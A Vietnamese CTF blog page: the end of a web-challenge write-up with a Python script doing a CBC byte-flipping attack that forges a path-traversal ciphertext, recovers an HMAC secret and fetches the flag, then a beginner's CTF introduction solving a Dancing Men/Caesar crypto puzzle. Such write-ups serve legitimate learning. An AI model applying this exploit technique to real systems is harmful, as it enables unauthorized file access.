1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import urllib, urllib2
import hmac,hashlib
 
def get_url_content(url):
    req = urllib2.Request(url)
    source = urllib2.urlopen(req).read()
 
    return source
 
 
def change_byte(string, pos, new_byte):
    new_str = ''
    for i in range(len(string)):
        if i != pos:
            new_str += string[i]
        else:
            new_str += new_byte
    return new_str
 
 
def get_filename(file):
    url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (file, 'xxx')
    source = get_url_content(url)
 
    filename = source.split('cite="./secret/')[1].split('"')[0]
    return filename
 
 
# === Byte Flipping 1 ===
target = 'aaaa/../flag.php'
filename = 'b764b44fd336b8281b62b257501ad3c6'
file = 'dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50'.decode('hex')
for pos in range(len(target)):
    file = change_byte(file, pos, chr(ord(filename[pos+16]) ^ ord(target[pos]) ^ (ord(file[pos]))))
print 'file:', file.encode('hex')
 
filename = get_filename(file.encode('hex'))
final_file = file.encode('hex')
secret_filename = filename
print 'filename: ', filename
# === Byte Flipping 1 ===
 
 
# === Byte Flipping 2 ===
file = change_byte(file, 16, '1')
filename = get_filename(file.encode('hex'))
secret_hmac = filename[-16:]
print 'secret_hmac:', secret_hmac.encode('hex')
sign = hmac.new(secret_hmac, secret_filename, hashlib.md5).hexdigest();
print 'sign:', sign
# === Byte Flipping 2 ===
 
 
# === Get Flag ===
url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (final_file, sign)
print 'source:', get_url_content(url).split('<blockquote')[1].split('</blockquote>')[0]
# === Get Flag ===

Flag = mario_CBCm0d3_is_swag_huh_;)

Ghi chú: Chúng ta cần để ý giá trị trả về của mỗi bước Byte Flipping, tránh để xuất hiện ‘|’, do điều này sẽ dẫn đến secret_hmac thu được bị sai.

by

[WhiteHat CTF 2013] I love Sherlock Holmes

Mình không có ý định sẽ writeup cho giải lần này, do không biết là có được phép public đề bài hay không. Tuy nhiên do có một số bạn quan tâm và muốn làm quen với CTF, mình xin phép dùng bài này để minh họa, do nó tương đối cơ bản và dễ tiếp cận.

Ghi chú: Toàn bộ nội dung được ghi theo cách hiểu của mình, và mình cũng chỉ là người mới của lĩnh vực này, nếu có gì chưa phù hợp, các bạn cứ báo lại và mình sẽ chỉnh sửa ngay.

CTF là gì?

CTF là viết tắt của Capture The Flag, và bằng vốn tiếng Anh kinh dị của mình thì nó có nghĩa kiểu kiểu như là Lấy cờ, Tìm cờ (giống trò chơi hồi bé, nhắm mắt đếm 5, 10, 15, 20, 25…, cho đến 100 thì bắt đầu đi kiếm mấy đứa đang ẩn nấp khắp mọi nơi ấy). Cờ ở đây thường là một đoạn văn bản, mà có thể được kiểm tra tự động. Ví dụ:

  • DayLaCo
  • yeuchimse_hinh_nhu_rat_dang_yeu
  • c41_n4y_cung_g01_l4_c0

Tức là, nếu quy ra cuộc sống tự nhiên, CTF tương tự như việc chúng ta được thả vào một căn phòng, và nhận yêu cầu: “Hãy tìm cho tôi một cái gì đó”. Cái gì đó ở đây (tức cờ), có thể được quy định sẵn về hình dáng của nó (như flag{abcdef}, ctf_this_is_flag chẳng hạn), hoặc không có thông tin gì kèm theo, khi đó chúng ta sẽ phải dựa theo cảm giác, rằng khi thấy một cái gì đó lạ lạ, thì nó rất có thể là cờ.

CTF có 2 dạng chính, là Jeopardy, và Attack-Defense, mình chỉ tham gia ở dạng đầu tiên. Jeopardy là hình thức chơi mà mỗi cuộc thi sẽ bao gồm các bài nhỏ, mỗi bài nhỏ lại có chứa một cờ để cho ta tìm. Khi tìm được cờ, chúng ta sẽ nhận được số điểm tương ứng. Các bài được đặt trong khá nhiều thể loại chuyên môn khác nhau, nhưng thường thì là:

  • Reverse: Dịch ngược phần mềm
  • Web: Bảo mật web
  • Crypto: Mật mã, mã hóa
  • Forensic: Điều tra số
  • Stegano: Ẩn giấu thông tin
  • Exploit: Khai thác lỗi

Cụ thể với WhiteHat CTF 2013, cuộc thi chia ra các mảng là Web, Crypto, Reverse, Forensic và Exploit. Mình sẽ minh họa với bài I love Sherlock Holmes, thuộc mảng Crypto.

Nội dung chính

Đề bài, chúng ta được cung cấp 1 file hình như sau:

Không có gì khác, tất cả chỉ vậy thôi, cũng không nói rằng chúng ta phải làm gì.

Đó chính là điều các bạn cần lưu ý, vì trừ trường hợp đặc biệt, còn lại thì chúng ta hiển nhiên cần hiểu rằng mọi bài sẽ có một đòi hỏi duy nhất, đó là tìm ra cờ, và submit kiếm điểm. Thay vì viết là: “Tìm x sao cho: x + 1 = 2”, chúng ta chỉ cần một cái đề: “x + 1 = 2” cũng đã coi như quá đủ!

Trở lại với công việc, nếu bạn đã từng đọc Holmes (mình thì khỏi nói, mình vô cùng cuồng Holmes và mỗi ngày hầu như đều đọc đi đọc lại mấy mẩu chuyện đã thuộc nằm lòng), thì bạn sẽ nhận ra ngay đây là phương pháp mã hóa xuất hiện trong vụ án “Những hình nhân nhảy múa”, tiếng Anh là Dancing Man. Ở vụ án này, Holmes dựa theo tần suất xuất hiện của từng chữ cái để dần dần suy ra bảng mã tham chiếu hoàn chỉnh. Chúng ta may mắn hơn Holmes, vì chúng ta có Google. Google biết mọi thứ, đó chính là niềm tin của mình sweet_kiss

Search một lúc, ta có bảng mã cho Dancing Man như sau:

Đơn giản là đối chiếu đề bài với bảng mã tìm được, chúng ta có dãy ký tự:

RHNTKXTMTEXGMXWWXVMBOX

Nó có phải là cờ không?

Tất nhiên là bạn có quyền thắc mắc như vậy, dù rằng thông thường cờ sẽ không vô nghĩa và xấu xí đến thế  emo_popo_sweat

Khỏi cần thắc mắc dài dòng làm gì, submit thử thì biết chứ có gì đâu.

Wrong!

Đổi sang chữ thường và submit lại.

Wrong!

emo_popo_pudency Đây có lẽ chính là điểm dừng của một số đội chơi khác, vì một lý do quá kinh khủng: không biết phải làm gì nữa emo_popo_beat_plaster

RHNTKXTMTEXGMXWWXVMBOX

Sau khi rà soát lại để chắc chắn rằng không đối chiếu nhầm ở đâu đó, chúng ta sẽ quên hết mọi thứ trong quá khứ, và coi như đề bài chỉ bắt đầu từ cái dòng ký tự xấu xí này mà thôi.

Có khá nhiều hướng khi giải quyết một bài crypto, như XOR các byte với một giá trị x nào đó, cộng thêm một giá trị y nào đó vào từng ký tự, xoay vòng các ký tự theo độ lệch z (cũng nào đó), hoặc phổ biến không kém, đó là hoán vị các ký tự (A thành S, B thành E, C thành X…), và nhiều rất nhiều thuật toán từ cơ bản đến nâng cao khác.

Hướng XOR ít khả thi, do chuỗi ta đang có rất đẹp (đẹp ở đây tức nó đều bao gồm các ký tự chữ cái), mà XOR thì không có đặc tính giữ lại độ đẹp của mật mã sau khi được giải mã (dù rằng một vài giá trị khi dùng làm khóa cũng mang lại điều này). Tuy nhiên, chúng ta vẫn sẽ giữ lại nó trong đầu như một phương án dự phòng.

Cộng thêm giá trị vào các byte, đây là một hướng tốt, có thể thử. Nhưng do mật mã có cả X và B, nên cộng thì cũng dở mà trừ thì cũng dở (vì chắc là nó vượt ra ngoài 2 biên của bảng chữ cái), xếp nó sau XOR theo độ ưu tiên vậy.

Xoay vòng các ký tự (còn gọi là Caesar): Hướng này vô cùng khả thi, do là xoay vòng, nên X + 3 = Z + 1 sẽ quay về A, nên đảm bảo rằng kết quả mã hóa cũng đẹp y như mật mã vậy. Hãy quan tâm đến nó một chút.

Hoán vị các ký tự, hướng này có thể loại ngay, do mật mã quá ngắn, không đủ cơ sở để suy luận.

Caesar

Vấn đề tiếp theo cần đối mặt, đó là nếu chọn Caesar, thì xoay với độ lệch bao nhiêu? Phổ biến thì chúng ta biết đến Rot13 (A sẽ chuyển thành N, B sẽ chuyển thành O, C sẽ chuyển thành P, và ở chiều ngược lại, N sẽ chuyển thành A, O sẽ chuyển thành B, P sẽ chuyển thành C).

Với bài này, Rot13 cho ra kết quả không đẹp:

Rot13(RHNTKXTMTEXGMXWWXVMBOX) = EUAGXKGZGRKTZKJJKIZOBK
Xấu như gấu emo_popo_beat_shot
Nhưng Rot13 chỉ là cái người ta hay dùng, và thực tế thì mình đã gặp không ít bài mà người ta Rot16 phút, Rot69, thậm chí Rot linh tinh loạn cả lên. Mà cũng chẳng sao cả, chúng ta có thể dùng một vài tool trên mạng, hoặc tự code vài dòng để có được kết quả của tất cả các phép Rot từ 1 đến 26, và xem xem có kết quả nào khả quan không:
Rot1: SIOULYUNUFYHNYXXYWNCPY
Rot2: TJPVMZVOVGZIOZYYZXODQZ
Rot3: UKQWNAWPWHAJPAZZAYPERA
Rot4: VLRXOBXQXIBKQBAABZQFSB
Rot5: WMSYPCYRYJCLRCBBCARGTC
Rot6: XNTZQDZSZKDMSDCCDBSHUD
Rot7: YOUAREATALENTEDDECTIVE
Rot8: ZPVBSFBUBMFOUFEEFDUJWF
Rot9: AQWCTGCVCNGPVGFFGEVKXG
Rot10: BRXDUHDWDOHQWHGGHFWLYH
Rot11: CSYEVIEXEPIRXIHHIGXMZI
Rot12: DTZFWJFYFQJSYJIIJHYNAJ
Rot13: EUAGXKGZGRKTZKJJKIZOBK
Rot14: FVBHYLHAHSLUALKKLJAPCL
Rot15: GWCIZMIBITMVBMLLMKBQDM
Rot16: HXDJANJCJUNWCNMMNLCREN
Rot17: IYEKBOKDKVOXDONNOMDSFO
Rot18: JZFLCPLELWPYEPOOPNETGP
Rot19: KAGMDQMFMXQZFQPPQOFUHQ
Rot20: LBHNERNGNYRAGRQQRPGVIR
Rot21: MCIOFSOHOZSBHSRRSQHWJS
Rot22: NDJPGTPIPATCITSSTRIXKT
Rot23: OEKQHUQJQBUDJUTTUSJYLU
Rot24: PFLRIVRKRCVEKVUUVTKZMV
Rot25: QGMSJWSLSDWFLWVVWULANW

Nếu tiếng Anh của bạn cũng siêu đẳng như tiếng Anh của mình, bạn sẽ thấy ngay Rot7 là cái mà ta đang tìm, kết quả thu được thực sự quá đẹp:

YOUAREATALENTEDDECTIVE

Nó đẹp đến nỗi mà nó đã có thể là cờ rồi, mình đặt niềm tin với tỉ lệ đặt 6 ăn 9 emo_popo_sure

Wrong!

Wrong!

Wrong!

 

emo_popo_waaaht  surrender

A du kít đinh mi ops

À hông có sao, còn chữ thường, vẫn còn chữ thường nữa mà emo_popo_cry

youareatalenteddective

Correct :)

Tổng kết

Như vậy, là mình đã vừa giới thiệu một vài điểm sơ qua về CTF, cũng như trình tự suy luận của mình đối với một bài thi cụ thể. Kiến thức là rất rộng (và sâu), nên chắc chắn rằng chúng ta sẽ luôn phải học hỏi hăng say nếu không muốn bị bỏ lại đằng sau và mau mau rớt hạng. Nếu bạn có gì đó không hiểu, hoặc bực mình vì chẳng biết XOR, Caesar nó là cái khỉ gì cả, thì hãy yên tâm, không ai sinh ra đã biết cộng trừ nhân chia đâu. Bạn còn rất nhiều cơ hội để tìm hiểu và tích lũy kinh nghiệm. Bạn có thể là người xuất phát muộn hơn, nhưng không ai có thể ngăn cản việc bạn về đích sớm hơn cả.

Chào mừng bạn đến với CTF! emo_popo_beauty